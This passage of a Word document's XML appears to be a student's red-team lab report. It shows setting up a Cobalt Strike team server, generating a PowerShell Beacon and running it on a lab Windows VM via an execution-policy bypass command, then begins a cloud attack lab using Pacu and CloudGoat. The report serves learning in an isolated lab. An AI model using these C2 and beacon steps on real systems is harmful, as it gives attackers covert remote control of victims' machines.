        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an open-source, Ruby-based framework which contains a database of 1000+ exploits ready-to-use on a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up and managing C2 infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a terminal in your Cobalt Strike Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./teamserver 192.168.204.130 root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now in the above command i used sudo as to run it in root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./teamserver them IP of your kali in this case mine is 192.168.204.130.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then a password which i used “root”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimize it and keep it running in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we will launch cobalt strike client using “.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cobaltstrike</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alias: C2 Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 192.168.204.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port: 50050 (Default)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User: kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally we will connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will create a HTTPS Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the GUI navigate to listener and add one HTTPS listener and payload as Beacon HTTPS and port 443 finally save it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since i am running a Windows11 VM i will make the Windows Executable Listener and as an output select PowerShell Script typically it will automatically assume the infrastructure as x64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now generate and save the beacon file as .ps1 extension.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Transfer it to the windows VM and open powershell to run it “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe -ExecutionPolicy Bypass -File beacon.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A lightning bolt will appear in the cobalt strike meaning the system has be compromised and is listening we can right click and interact with the session even manage multiple sessions and customize payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="107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2445"/>
        <w:gridCol w:w="2370"/>
        <w:gridCol w:w="4125"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="2445"/>
            <w:gridCol w:w="2370"/>
            <w:gridCol w:w="41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Session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Target IP</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Payload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SID001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192.168.204.143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PowerShell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Beacon established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Established a C2 infrastructure using Cobalt Strike with a Malleable HTTPS profile to encrypt communications. Deployed a stageless PowerShell beacon on a Windows VM (192.168.204.143) to ensure reliable execution without secondary downloads. Successfully managed the session via the beacon’s periodic check-ins, demonstrating persistent, encrypted remote access within the lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Attack Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A cloud attack lab is a controlled, virtualized environment designed to simulate real-world cyberattacks against cloud infrastructure (AWS, Azure, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pacu - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an open-source, Python 3-based AWS exploitation framework designed for offensive security testing (penetrations testing) against Amazon Web Services (AWS) environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">awscli - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an open-source tool that enables you to interact with AWS services using commands in your command-line shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CloudGoat - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is used to deploy (and shutdown) a vulnerable set of AWS resources, designed to teach AWS security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating S3 Bucket using awscli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So to do this lab i go to thm cloudgoat lab where there was an introduction to cloudgoat - what it is, what are the goals in it like: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Focused, Curated, High-Quality Learning Experiences - Each of CloudGoat’s scenarios should provide the opportunity for experimentation, exploration, and building hands-on cloud security skills. Good Documentation - We've done our best to ensure that CloudGoat’s scenarios are well-documented and easy to understand and evaluate in terms of difficulty, content, structure, and skills-required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4057650" cy="1095375"/>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057650" cy="1095375"/>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keepLines w:val="0"/>
